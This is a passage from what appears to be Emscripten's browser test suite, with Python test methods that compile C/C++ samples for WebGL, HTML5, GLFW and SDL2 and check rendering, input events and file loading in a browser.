try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# Tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists
# but context creation fails, we can then manually try to create a
# WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
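# Module.locateFile (set via a pre-js or in the shell HTML) redirects requests for the
# .mem/.wasm/.data files into a subdirectory, where we have moved them.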
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file and get pixel data. Also covers -O2 with --preload-file and memory init files
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
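# Drive SDL2 keyboard input by dispatching synthetic keydown/keypress/keyup DOM events
# from a pre-js.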
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
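# Like test_sdl2_mouse, but the canvas sits inside an offset container and the synthetic
# events use page coordinates, so the mouse position must be corrected for the canvas
# offset (-DTEST_SDL_MOUSE_OFFSETS).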
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
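# Render with SDL2 under --proxy-to-worker and reftest the main-thread canvas; the
# generated HTML is patched so the reftest only runs after rAF updates have settled.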
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rAF callbacks to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(path_from_root('tests', 'third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
